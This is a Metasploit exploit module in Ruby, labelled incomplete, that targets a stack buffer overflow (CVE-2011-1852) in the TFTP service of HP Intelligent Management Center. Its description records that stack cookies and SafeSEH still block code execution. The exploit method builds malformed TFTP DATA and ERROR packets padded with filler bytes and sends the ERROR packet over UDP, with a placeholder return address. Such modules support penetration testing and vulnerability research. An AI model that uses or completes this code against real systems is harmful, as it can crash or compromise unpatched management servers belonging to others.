##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::Udp

	def initialize(info={})
		super(update_info(info,
			'Name'           => "[INCOMPLETE] HP Intelligent Management Center tftpserver ERROR Vulnerability",
			'Description'    => %q{
					This module exploits a vulnerability found on HP Intelligent Management Center's
				TFTP service.  By either supplying a malformed DATA or ERROR TFTP packet, the process
				will copy the user input into a fixed-length buffer on the stack, which results in
				arbitrary code execution under the context of the SYSTEM user.
				
				Note: If the user input exceeds 1100 bytes, the vulnerable code won't trigger. Even if
				you're able to trigger it (send about 1000 bytes), overwrite the SEH, /GS is still
				enabled, and we don't seem to be raising an exception before @__security_check_cookie()
				is called (which leads to kernel32.TerminateProcess). Also, all loded modules are safeseh
				protected.  Use an address outside the range of loaded modules, perhaps?

				The copying routine is at 0x405331 (XP SP3).
			},
			'License'        => MSF_LICENSE,
			'Version'        => "$Revision$",
			'Author'         =>
				[
					'sinn3r',  #Metasploit
				],
			'References'     =>
				[
					[ 'CVE', '2011-1852' ],
					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-164/' ],
					[ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02822750' ],
				],
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
			'DefaultOptions'  =>
				{
					'ExitFunction' => "seh",  #none/process/seh
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows XP SP3', {'Ret'=>0x41414141} ],
				],
			'Privileged'     => false,
			'DisclosureDate' => "Apr 1 2011",
			'DefaultTarget'  => 0))
	end

	def exploit
		print_status("Sending packet...")

		connect_udp

		#1 = Read; 2 = Write; 3 = Data; 4 = ACK; 5 = Err
		#http://www.freesoft.org/CIE/RFC/1350/5.htm

		#Initial packet. Probably don't need to use this.
=begin
		pkt  = ''
		pkt <<  "\x00\x05"  #Opcode
		pkt << "\x41"*4     #Filename
		pkt << "\x00"       #Null byte terminator
		pkt << "netascii"   #Mode
		pkt << "\x00"       #Null byte terminator
=end

		#Data packet
		data = ''
		data << "\x00\x03"  #Opcode
		data << "\x00\x01"  #Block number
		data << "\x41"*1000    #Data

		#Error packet
		err  = ''
		err << "\x00\x05"   #Opcode
		err << "\x00\x01"   #Error code
		err << "\x41"*550     #Message
		err << "\x00"       #Null byte terminator

		udp_sock.put(err)

		disconnect_udp
	end
end
